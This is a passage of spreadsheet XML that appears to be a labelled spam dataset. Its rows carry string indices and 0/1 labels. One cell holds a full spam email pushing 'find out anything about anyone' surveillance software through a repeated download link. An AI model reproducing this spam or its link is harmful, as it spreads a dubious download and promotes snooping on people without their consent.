        <v>490</v>
      </c>
      <c r="C6132" s="1" t="s">
        <v>7050</v>
      </c>
      <c r="D6132" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6133" hidden="1">
      <c r="A6133" s="1">
        <v>6131.0</v>
      </c>
      <c r="B6133" s="1" t="s">
        <v>902</v>
      </c>
      <c r="C6133" s="1" t="s">
        <v>8167</v>
      </c>
      <c r="D6133" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6134" hidden="1">
      <c r="A6134" s="1">
        <v>6132.0</v>
      </c>
      <c r="B6134" s="1" t="s">
        <v>8168</v>
      </c>
      <c r="C6134" s="1" t="s">
        <v>8169</v>
      </c>
      <c r="D6134" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6135" hidden="1">
      <c r="A6135" s="1">
        <v>6133.0</v>
      </c>
      <c r="B6135" s="1" t="s">
        <v>1987</v>
      </c>
      <c r="C6135" s="1" t="s">
        <v>1988</v>
      </c>
      <c r="D6135" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6136" hidden="1">
      <c r="A6136" s="1">
        <v>6134.0</v>
      </c>
      <c r="B6136" s="1" t="s">
        <v>3977</v>
      </c>
      <c r="C6136" s="1" t="s">
        <v>3978</v>
      </c>
      <c r="D6136" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6137">
      <c r="A6137" s="1">
        <v>6135.0</v>
      </c>
      <c r="B6137" s="1" t="s">
        <v>8170</v>
      </c>
      <c r="C6137" s="1" t="s">
        <v>8171</v>
      </c>
      <c r="D6137" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6138">
      <c r="A6138" s="1">
        <v>6136.0</v>
      </c>
      <c r="B6138" s="1" t="s">
        <v>8172</v>
      </c>
      <c r="C6138" s="1" t="s">
        <v>8173</v>
      </c>
      <c r="D6138" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6139" hidden="1">
      <c r="A6139" s="1">
        <v>6137.0</v>
      </c>
      <c r="B6139" s="1" t="s">
        <v>294</v>
      </c>
      <c r="C6139" s="1" t="s">
        <v>295</v>
      </c>
      <c r="D6139" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6140" hidden="1">
      <c r="A6140" s="1">
        <v>6138.0</v>
      </c>
      <c r="B6140" s="1" t="s">
        <v>7402</v>
      </c>
      <c r="C6140" s="1" t="s">
        <v>7403</v>
      </c>
      <c r="D6140" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6141">
      <c r="A6141" s="1">
        <v>6139.0</v>
      </c>
      <c r="B6141" s="1" t="s">
        <v>8174</v>
      </c>
      <c r="C6141" s="1" t="s">
        <v>8175</v>
      </c>
      <c r="D6141" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6142">
      <c r="A6142" s="1">
        <v>6140.0</v>
      </c>
      <c r="B6142" s="1" t="s">
        <v>8176</v>
      </c>
      <c r="C6142" s="1" t="s">
        <v>8177</v>
      </c>
      <c r="D6142" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6143">
      <c r="A6143" s="1">
        <v>6141.0</v>
      </c>
      <c r="B6143" s="1" t="s">
        <v>8178</v>
      </c>
      <c r="C6143" s="1" t="s">
        <v>8179</v>
      </c>
      <c r="D6143" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6144" hidden="1">
      <c r="A6144" s="1">
        <v>6142.0</v>
      </c>
      <c r="B6144" s="1" t="s">
        <v>4818</v>
      </c>
      <c r="C6144" s="1" t="s">
        <v>4819</v>
      </c>
      <c r="D6144" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6145" hidden="1">
      <c r="A6145" s="1">
        <v>6143.0</v>
      </c>
      <c r="B6145" s="1" t="s">
        <v>6899</v>
      </c>
      <c r="C6145" s="1" t="s">
        <v>8180</v>
      </c>
      <c r="D6145" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6146" hidden="1">
      <c r="A6146" s="1">
        <v>6144.0</v>
      </c>
      <c r="B6146" s="1" t="s">
        <v>8181</v>
      </c>
      <c r="C6146" s="1" t="s">
        <v>8182</v>
      </c>
      <c r="D6146" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6147" hidden="1">
      <c r="A6147" s="1">
        <v>6145.0</v>
      </c>
      <c r="B6147" s="1" t="s">
        <v>8183</v>
      </c>
      <c r="C6147" s="1" t="s">
        <v>8184</v>
      </c>
      <c r="D6147" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6148" hidden="1">
      <c r="A6148" s="1">
        <v>6146.0</v>
      </c>
      <c r="B6148" s="1" t="s">
        <v>8185</v>
      </c>
      <c r="C6148" s="1" t="s">
        <v>8186</v>
      </c>
      <c r="D6148" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6149">
      <c r="A6149" s="1">
        <v>6147.0</v>
      </c>
      <c r="B6149" s="1" t="s">
        <v>8187</v>
      </c>
      <c r="C6149" s="1" t="s">
        <v>8188</v>
      </c>
      <c r="D6149" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6150" hidden="1">
      <c r="A6150" s="1">
        <v>6148.0</v>
      </c>
      <c r="B6150" s="1" t="s">
        <v>6016</v>
      </c>
      <c r="C6150" s="1" t="s">
        <v>6017</v>
      </c>
      <c r="D6150" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6151" hidden="1">
      <c r="A6151" s="1">
        <v>6149.0</v>
      </c>
      <c r="B6151" s="1" t="s">
        <v>40</v>
      </c>
      <c r="C6151" s="1" t="s">
        <v>5100</v>
      </c>
      <c r="D6151" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6152" hidden="1">
      <c r="A6152" s="1">
        <v>6150.0</v>
      </c>
      <c r="B6152" s="1" t="s">
        <v>307</v>
      </c>
      <c r="C6152" s="1" t="s">
        <v>2417</v>
      </c>
      <c r="D6152" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6153" hidden="1">
      <c r="A6153" s="1">
        <v>6151.0</v>
      </c>
      <c r="B6153" s="1" t="s">
        <v>1723</v>
      </c>
      <c r="C6153" s="1" t="s">
        <v>1724</v>
      </c>
      <c r="D6153" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6154" hidden="1">
      <c r="A6154" s="1">
        <v>6152.0</v>
      </c>
      <c r="B6154" s="1" t="s">
        <v>64</v>
      </c>
      <c r="C6154" s="1" t="s">
        <v>6230</v>
      </c>
      <c r="D6154" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6155" hidden="1">
      <c r="A6155" s="1">
        <v>6153.0</v>
      </c>
      <c r="B6155" s="1" t="s">
        <v>1729</v>
      </c>
      <c r="C6155" s="1" t="s">
        <v>1730</v>
      </c>
      <c r="D6155" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6156" hidden="1">
      <c r="A6156" s="1">
        <v>6154.0</v>
      </c>
      <c r="B6156" s="1" t="s">
        <v>8189</v>
      </c>
      <c r="C6156" s="1" t="s">
        <v>8190</v>
      </c>
      <c r="D6156" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6157" hidden="1">
      <c r="A6157" s="1">
        <v>6155.0</v>
      </c>
      <c r="B6157" s="1" t="s">
        <v>3646</v>
      </c>
      <c r="C6157" s="1" t="s">
        <v>3647</v>
      </c>
      <c r="D6157" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6158" hidden="1">
      <c r="A6158" s="1">
        <v>6156.0</v>
      </c>
      <c r="B6158" s="1" t="s">
        <v>26</v>
      </c>
      <c r="C6158" s="1" t="s">
        <v>156</v>
      </c>
      <c r="D6158" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6159" hidden="1">
      <c r="A6159" s="1">
        <v>6157.0</v>
      </c>
      <c r="B6159" s="1" t="s">
        <v>1651</v>
      </c>
      <c r="C6159" s="1" t="s">
        <v>8191</v>
      </c>
      <c r="D6159" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6160" hidden="1">
      <c r="A6160" s="1">
        <v>6158.0</v>
      </c>
      <c r="B6160" s="1" t="s">
        <v>1027</v>
      </c>
      <c r="C6160" s="1" t="s">
        <v>8192</v>
      </c>
      <c r="D6160" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6161" hidden="1">
      <c r="A6161" s="1">
        <v>6159.0</v>
      </c>
      <c r="B6161" s="1" t="s">
        <v>1906</v>
      </c>
      <c r="C6161" s="1" t="s">
        <v>7936</v>
      </c>
      <c r="D6161" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6162">
      <c r="A6162" s="1">
        <v>6160.0</v>
      </c>
      <c r="B6162" s="1" t="s">
        <v>8193</v>
      </c>
      <c r="C6162" s="1" t="s">
        <v>8194</v>
      </c>
      <c r="D6162" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6163">
      <c r="A6163" s="1">
        <v>6161.0</v>
      </c>
      <c r="B6163" s="1" t="s">
        <v>879</v>
      </c>
      <c r="C6163" s="1" t="s">
        <v>4876</v>
      </c>
      <c r="D6163" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6164" hidden="1">
      <c r="A6164" s="1">
        <v>6162.0</v>
      </c>
      <c r="B6164" s="1" t="s">
        <v>1684</v>
      </c>
      <c r="C6164" s="1" t="s">
        <v>1685</v>
      </c>
      <c r="D6164" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6165" hidden="1">
      <c r="A6165" s="1">
        <v>6163.0</v>
      </c>
      <c r="B6165" s="1" t="s">
        <v>3238</v>
      </c>
      <c r="C6165" s="1" t="s">
        <v>3239</v>
      </c>
      <c r="D6165" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6166" hidden="1">
      <c r="A6166" s="1">
        <v>6164.0</v>
      </c>
      <c r="B6166" s="1" t="s">
        <v>6405</v>
      </c>
      <c r="C6166" s="1" t="s">
        <v>8195</v>
      </c>
      <c r="D6166" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6167" hidden="1">
      <c r="A6167" s="1">
        <v>6165.0</v>
      </c>
      <c r="B6167" s="1" t="s">
        <v>1008</v>
      </c>
      <c r="C6167" s="1" t="s">
        <v>8196</v>
      </c>
      <c r="D6167" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6168">
      <c r="A6168" s="1">
        <v>6166.0</v>
      </c>
      <c r="B6168" s="1" t="s">
        <v>8197</v>
      </c>
      <c r="C6168" s="1" t="s">
        <v>8198</v>
      </c>
      <c r="D6168" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6169" hidden="1">
      <c r="A6169" s="1">
        <v>6167.0</v>
      </c>
      <c r="B6169" s="1" t="s">
        <v>8199</v>
      </c>
      <c r="C6169" s="1" t="s">
        <v>8200</v>
      </c>
      <c r="D6169" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6170" hidden="1">
      <c r="A6170" s="1">
        <v>6168.0</v>
      </c>
      <c r="B6170" s="1" t="s">
        <v>2628</v>
      </c>
      <c r="C6170" s="1" t="s">
        <v>2629</v>
      </c>
      <c r="D6170" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6171" hidden="1">
      <c r="A6171" s="1">
        <v>6169.0</v>
      </c>
      <c r="B6171" s="1" t="s">
        <v>5699</v>
      </c>
      <c r="C6171" s="1" t="s">
        <v>5700</v>
      </c>
      <c r="D6171" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6172" hidden="1">
      <c r="A6172" s="1">
        <v>6170.0</v>
      </c>
      <c r="B6172" s="1" t="s">
        <v>8201</v>
      </c>
      <c r="C6172" s="1" t="s">
        <v>8202</v>
      </c>
      <c r="D6172" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6173" hidden="1">
      <c r="A6173" s="1">
        <v>6171.0</v>
      </c>
      <c r="B6173" s="1" t="s">
        <v>2236</v>
      </c>
      <c r="C6173" s="1" t="s">
        <v>8203</v>
      </c>
      <c r="D6173" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6174" hidden="1">
      <c r="A6174" s="1">
        <v>6172.0</v>
      </c>
      <c r="B6174" s="1" t="s">
        <v>8204</v>
      </c>
      <c r="C6174" s="1" t="s">
        <v>8205</v>
      </c>
      <c r="D6174" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6175">
      <c r="A6175" s="1">
        <v>6173.0</v>
      </c>
      <c r="B6175" s="1" t="s">
        <v>8206</v>
      </c>
      <c r="C6175" s="1" t="s">
        <v>8207</v>
      </c>
      <c r="D6175" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6176" hidden="1">
      <c r="A6176" s="1">
        <v>6174.0</v>
      </c>
      <c r="B6176" s="1" t="s">
        <v>261</v>
      </c>
      <c r="C6176" s="1" t="s">
        <v>2575</v>
      </c>
      <c r="D6176" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6177" hidden="1">
      <c r="A6177" s="1">
        <v>6175.0</v>
      </c>
      <c r="B6177" s="1" t="s">
        <v>8208</v>
      </c>
      <c r="C6177" s="1" t="s">
        <v>8209</v>
      </c>
      <c r="D6177" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6178" hidden="1">
      <c r="A6178" s="1">
        <v>6176.0</v>
      </c>
      <c r="B6178" s="1" t="s">
        <v>2415</v>
      </c>
      <c r="C6178" s="1" t="s">
        <v>2416</v>
      </c>
      <c r="D6178" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6179" hidden="1">
      <c r="A6179" s="1">
        <v>6177.0</v>
      </c>
      <c r="B6179" s="1" t="s">
        <v>8210</v>
      </c>
      <c r="C6179" s="1" t="s">
        <v>8211</v>
      </c>
      <c r="D6179" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6180" hidden="1">
      <c r="A6180" s="1">
        <v>6178.0</v>
      </c>
      <c r="B6180" s="1" t="s">
        <v>5544</v>
      </c>
      <c r="C6180" s="1" t="s">
        <v>5545</v>
      </c>
      <c r="D6180" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6181" hidden="1">
      <c r="A6181" s="1">
        <v>6179.0</v>
      </c>
      <c r="B6181" s="1" t="s">
        <v>1473</v>
      </c>
      <c r="C6181" s="1" t="s">
        <v>1474</v>
      </c>
      <c r="D6181" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6182" hidden="1">
      <c r="A6182" s="1">
        <v>6180.0</v>
      </c>
      <c r="B6182" s="1" t="s">
        <v>7384</v>
      </c>
      <c r="C6182" s="1" t="s">
        <v>8212</v>
      </c>
      <c r="D6182" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6183" hidden="1">
      <c r="A6183" s="1">
        <v>6181.0</v>
      </c>
      <c r="B6183" s="1" t="s">
        <v>5930</v>
      </c>
      <c r="C6183" s="1" t="s">
        <v>8213</v>
      </c>
      <c r="D6183" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6184" hidden="1">
      <c r="A6184" s="1">
        <v>6182.0</v>
      </c>
      <c r="B6184" s="1" t="s">
        <v>601</v>
      </c>
      <c r="C6184" s="1" t="s">
        <v>6155</v>
      </c>
      <c r="D6184" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6185" hidden="1">
      <c r="A6185" s="1">
        <v>6183.0</v>
      </c>
      <c r="B6185" s="1" t="s">
        <v>1190</v>
      </c>
      <c r="C6185" s="1" t="s">
        <v>8214</v>
      </c>
      <c r="D6185" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6186" hidden="1">
      <c r="A6186" s="1">
        <v>6184.0</v>
      </c>
      <c r="B6186" s="1" t="s">
        <v>34</v>
      </c>
      <c r="C6186" s="1" t="s">
        <v>8215</v>
      </c>
      <c r="D6186" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6187">
      <c r="A6187" s="1">
        <v>6185.0</v>
      </c>
      <c r="B6187" s="1" t="s">
        <v>8216</v>
      </c>
      <c r="C6187" s="1" t="s">
        <v>8217</v>
      </c>
      <c r="D6187" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6188" hidden="1">
      <c r="A6188" s="1">
        <v>6186.0</v>
      </c>
      <c r="B6188" s="1" t="s">
        <v>4487</v>
      </c>
      <c r="C6188" s="1" t="s">
        <v>4488</v>
      </c>
      <c r="D6188" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6189">
      <c r="A6189" s="1">
        <v>6187.0</v>
      </c>
      <c r="B6189" s="1" t="s">
        <v>8218</v>
      </c>
      <c r="C6189" s="1" t="s">
        <v>8219</v>
      </c>
      <c r="D6189" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6190" hidden="1">
      <c r="A6190" s="1">
        <v>6188.0</v>
      </c>
      <c r="B6190" s="1" t="s">
        <v>40</v>
      </c>
      <c r="C6190" s="1" t="s">
        <v>8220</v>
      </c>
      <c r="D6190" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6191">
      <c r="A6191" s="1">
        <v>6189.0</v>
      </c>
      <c r="B6191" s="1" t="s">
        <v>7253</v>
      </c>
      <c r="C6191" s="1" t="s">
        <v>7254</v>
      </c>
      <c r="D6191" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6192">
      <c r="A6192" s="1">
        <v>6190.0</v>
      </c>
      <c r="B6192" s="1" t="s">
        <v>922</v>
      </c>
      <c r="C6192" s="3" t="str">
        <f>============================================
 Brand-New VERSION 7.0 Just Released:
 Astounding New Software Lets You Find
 Out Almost ANYTHING about ANYONE...
 =============================================
 Download it right now (no charge card needed):
 For the brand-new VERSION 7.0, click here:
 &lt;a href="http://go21bt.let.to/"&gt;
 http://go21bt.let.to/ &lt;/a&gt;
 Discover EVERYTHING you ever wanted to know about:
 your friends
 your family
 your enemies
 your employees
 yourself - Is Someone Using Your Identity?
 even your boss!
 DID YOU KNOW you can search for ANYONE, ANYTIME,
 ANYWHERE, right on the Internet?
 Download this software right now--click here:
 &lt;a href="http://go21bt.let.to/"&gt;
 http://go21bt.let.to/ &lt;/a&gt;
 This mammoth COLLECTION of internet investigative
 tools &amp; research sites will provide you with NEARLY
 400 GIGANTIC SEARCH RESOURCES to locate information on:
 * people you trust
 * screen new tenants or roommates
 * housekeepers
 * current or past employment
 * people you work with
 * license plate number with name and address
 * unlisted phone numbers
 * long lost friends
 Locate e-mails, phone numbers, or addresses:
 o Get a Copy of Your FBI file.
 o Get a Copy of Your Military file.
 o FIND DEBTORS and locate HIDDEN ASSETS.
 o Check CRIMINAL Drug and driving RECORDS.
 o Lookup someone's EMPLOYMENT history.
 For the brand-new VERSION 7.0, click here:
 &lt;a href="http://go21bt.let.to/"&gt;
 http://go21bt.let.to/ &lt;/a&gt;
 Locate old classmates, missing family
 member, or a LONG LOST LOVE:
 - Do Background Checks on EMPLOYEES before you
   hire them.
 - Investigate your family history, birth, death
   and government records!
 - Discover how UNLISTED phone numbers are located.
 - Check out your new or old LOVE INTEREST.
 - Verify your own CREDIT REPORTS so you can
   correct WRONG information.
 - Track anyone's Internet ACTIVITY; see the sites
   they visit, and what they are typing.
 - Explore SECRET WEB SITES that conventional
   search engines have never found.
 For the brand-new VERSION 7.0, click here:
 &lt;a href="http://go21bt.let.to/"&gt;
 http://go21bt.let.to/ &lt;/a&gt;
 ==&gt; Discover little-known ways to make UNTRACEABLE
     PHONE CALLS.
 ==&gt; Check ADOPTION records; locate MISSING CHILDREN
     or relatives.
 ==&gt; Dig up information on your FRIENDS, NEIGHBORS,
     or BOSS!
 ==&gt; Discover EMPLOYMENT opportunities from AROUND
     THE WORLD!
 ==&gt; Locate transcripts and COURT ORDERS from all
     50 states.
 ==&gt; CLOAK your EMAIL so your true address can't
     be discovered.
 ==&gt; Find out how much ALIMONY your neighbor is paying.
 ==&gt; Discover how to check your phones for WIRETAPS.
 ==&gt; Or check yourself out, and you will be shocked at
     what you find!!
 These are only a few things you can do, There
 is no limit to the power of this software!!
 To download this software, and have it in less
 than 5 minutes click on the url below to visit
 our website (NEW: No charge card needed!)
 &lt;a href="http://go21bt.let.to/"&gt;
 http://go21bt.let.to/ &lt;/a&gt;
 If you no longer wish to hear about future
 offers from us, send us a message with STOP
 in the subject line, by clicking here:
 &lt;a href="mailto:remv0615b@bk.ru?subject=STOP_GO21BT"&gt;
 mailto:remv0615b@bk.ru?subject=STOP_GO21BT &lt;/a&gt;
 Please allow up to 72 hours to take effect.
 Please do not include any correspondence in your
 message to this automatic stop robot--it will
 not be read. All requests processed automatically.
  [BFRYTE^3247(^(PO1:KJ)_8J7BJK9^":}H]
</f>
        <v>#ERROR!</v>
      </c>
      <c r="D6192" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6193">
      <c r="A6193" s="1">
        <v>6191.0</v>
      </c>
      <c r="B6193" s="1" t="s">
        <v>8221</v>
      </c>
      <c r="C6193" s="1" t="s">
        <v>8222</v>
      </c>
      <c r="D6193" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6194" hidden="1">
      <c r="A6194" s="1">
        <v>6192.0</v>
      </c>
      <c r="B6194" s="1" t="s">
        <v>2951</v>
      </c>
      <c r="C6194" s="1" t="s">
        <v>8223</v>
      </c>
      <c r="D6194" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6195" hidden="1">
      <c r="A6195" s="1">
        <v>6193.0</v>
      </c>
      <c r="B6195" s="1" t="s">
        <v>323</v>
      </c>
      <c r="C6195" s="1" t="s">
        <v>3676</v>
      </c>
      <c r="D6195" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6196" hidden="1">
      <c r="A6196" s="1">
        <v>6194.0</v>
      </c>
      <c r="B6196" s="1" t="s">
        <v>232</v>
      </c>
      <c r="C6196" s="1" t="s">
        <v>2318</v>
      </c>
      <c r="D6196" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6197" hidden="1">
      <c r="A6197" s="1">
        <v>6195.0</v>
      </c>
      <c r="B6197" s="1" t="s">
        <v>8224</v>
      </c>
      <c r="C6197" s="1" t="s">
        <v>8225</v>
      </c>
      <c r="D6197" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6198" hidden="1">
      <c r="A6198" s="1">
        <v>6196.0</v>
      </c>
      <c r="B6198" s="1" t="s">
        <v>8226</v>
      </c>
      <c r="C6198" s="1" t="s">
        <v>8227</v>
      </c>
      <c r="D6198" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6199" hidden="1">
      <c r="A6199" s="1">
        <v>6197.0</v>
      </c>
      <c r="B6199" s="1" t="s">
        <v>8228</v>
      </c>
      <c r="C6199" s="1" t="s">
        <v>8229</v>
      </c>
      <c r="D6199" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6200" hidden="1">
      <c r="A6200" s="1">
        <v>6198.0</v>
      </c>
      <c r="B6200" s="1" t="s">
        <v>2240</v>
      </c>
      <c r="C6200" s="1" t="s">
        <v>8230</v>
      </c>
      <c r="D6200" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6201" hidden="1">
      <c r="A6201" s="1">
        <v>6199.0</v>
      </c>
      <c r="B6201" s="1" t="s">
        <v>8231</v>
      </c>
      <c r="C6201" s="1" t="s">
        <v>8232</v>
      </c>
      <c r="D6201" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6202" hidden="1">
      <c r="A6202" s="1">
        <v>6200.0</v>
      </c>
      <c r="B6202" s="1" t="s">
        <v>56</v>
      </c>
      <c r="C6202" s="1" t="s">
        <v>3889</v>
      </c>
      <c r="D6202" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6203" hidden="1">
      <c r="A6203" s="1">
        <v>6201.0</v>
      </c>
      <c r="B6203" s="1" t="s">
        <v>8233</v>
      </c>
      <c r="C6203" s="1" t="s">
        <v>8234</v>
      </c>
      <c r="D6203" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6204" hidden="1">
      <c r="A6204" s="1">
        <v>6202.0</v>
      </c>
      <c r="B6204" s="1" t="s">
        <v>8235</v>
      </c>
      <c r="C6204" s="1" t="s">
        <v>8236</v>
      </c>
      <c r="D6204" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6205" hidden="1">
      <c r="A6205" s="1">
        <v>6203.0</v>
      </c>
      <c r="B6205" s="1" t="s">
        <v>6572</v>
      </c>
      <c r="C6205" s="1" t="s">
        <v>8237</v>
      </c>
      <c r="D6205" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6206" hidden="1">
      <c r="A6206" s="1">
        <v>6204.0</v>
      </c>
      <c r="B6206" s="1" t="s">
        <v>639</v>
      </c>
      <c r="C6206" s="1" t="s">
        <v>640</v>
      </c>
      <c r="D6206" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6207">
      <c r="A6207" s="1">
        <v>6205.0</v>
      </c>
      <c r="B6207" s="1" t="s">
        <v>8238</v>
      </c>
      <c r="C6207" s="1" t="s">
        <v>8239</v>
      </c>
      <c r="D6207" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6208" hidden="1">
      <c r="A6208" s="1">
        <v>6206.0</v>
      </c>
      <c r="B6208" s="1" t="s">
        <v>8240</v>
      </c>
      <c r="C6208" s="1" t="s">
        <v>8241</v>
      </c>
      <c r="D6208" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6209" hidden="1">
      <c r="A6209" s="1">
        <v>6207.0</v>
      </c>
      <c r="B6209" s="1" t="s">
        <v>8242</v>
      </c>
      <c r="C6209" s="1" t="s">
        <v>8243</v>
      </c>
      <c r="D6209" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6210" hidden="1">
      <c r="A6210" s="1">
        <v>6208.0</v>
      </c>
      <c r="B6210" s="1" t="s">
        <v>3489</v>
      </c>
      <c r="C6210" s="1" t="s">
        <v>8244</v>
      </c>
      <c r="D6210" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6211">
      <c r="A6211" s="1">
        <v>6209.0</v>
      </c>
      <c r="B6211" s="1" t="s">
        <v>7127</v>
      </c>
      <c r="C6211" s="1" t="s">
        <v>7128</v>
      </c>
      <c r="D6211" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6212">
      <c r="A6212" s="1">
        <v>6210.0</v>
      </c>
      <c r="B6212" s="1" t="s">
        <v>175</v>
      </c>
      <c r="C6212" s="1" t="s">
        <v>176</v>
      </c>
      <c r="D6212" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6213">
      <c r="A6213" s="1">
        <v>6211.0</v>
      </c>
      <c r="B6213" s="1" t="s">
        <v>3479</v>
      </c>
      <c r="C6213" s="1" t="s">
        <v>3480</v>
      </c>
      <c r="D6213" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6214" hidden="1">
      <c r="A6214" s="1">
        <v>6212.0</v>
      </c>
      <c r="B6214" s="1" t="s">
        <v>8245</v>
      </c>
      <c r="C6214" s="1" t="s">
        <v>8246</v>
      </c>
      <c r="D6214" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6215" hidden="1">
      <c r="A6215" s="1">
        <v>6213.0</v>
      </c>
      <c r="B6215" s="1" t="s">
        <v>3702</v>
      </c>
      <c r="C6215" s="1" t="s">
        <v>3703</v>
      </c>
      <c r="D6215" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6216">
      <c r="A6216" s="1">
        <v>6214.0</v>
      </c>
      <c r="B6216" s="1" t="s">
        <v>8247</v>
      </c>
      <c r="D6216" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6217" hidden="1">
      <c r="A6217" s="1">
        <v>6215.0</v>
      </c>
      <c r="B6217" s="1" t="s">
        <v>8248</v>
      </c>
      <c r="C6217" s="1" t="s">
        <v>8249</v>
      </c>
      <c r="D6217" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6218" hidden="1">
      <c r="A6218" s="1">
        <v>6216.0</v>
      </c>
      <c r="B6218" s="1" t="s">
        <v>8250</v>
      </c>
      <c r="C6218" s="1" t="s">
        <v>8251</v>
      </c>
      <c r="D6218" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6219">
      <c r="A6219" s="1">
        <v>6217.0</v>
      </c>
      <c r="B6219" s="1" t="s">
        <v>1046</v>
      </c>
      <c r="C6219" s="1" t="s">
        <v>1047</v>
      </c>
      <c r="D6219" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6220">
      <c r="A6220" s="1">
        <v>6218.0</v>
      </c>
      <c r="B6220" s="1" t="s">
        <v>8252</v>
      </c>
      <c r="C6220" s="1" t="s">
        <v>8253</v>
      </c>
      <c r="D6220" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6221">
      <c r="A6221" s="1">
        <v>6219.0</v>
      </c>
      <c r="B6221" s="1" t="s">
        <v>8254</v>
      </c>
      <c r="C6221" s="1" t="s">
        <v>8255</v>
      </c>
      <c r="D6221" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6222">
      <c r="A6222" s="1">
        <v>6220.0</v>
      </c>
      <c r="B6222" s="1" t="s">
        <v>1335</v>
      </c>
      <c r="C6222" s="1" t="s">
        <v>8256</v>
      </c>
      <c r="D6222" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6223" hidden="1">
      <c r="A6223" s="1">
        <v>6221.0</v>
      </c>
      <c r="B6223" s="1" t="s">
        <v>632</v>
      </c>
      <c r="C6223" s="1" t="s">
        <v>633</v>
      </c>
      <c r="D6223" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6224" hidden="1">
      <c r="A6224" s="1">
        <v>6222.0</v>
      </c>
      <c r="B6224" s="1" t="s">
        <v>2052</v>
      </c>
      <c r="C6224" s="1" t="s">
        <v>2053</v>
      </c>
      <c r="D6224" s="1">
        <v>0.0</v>
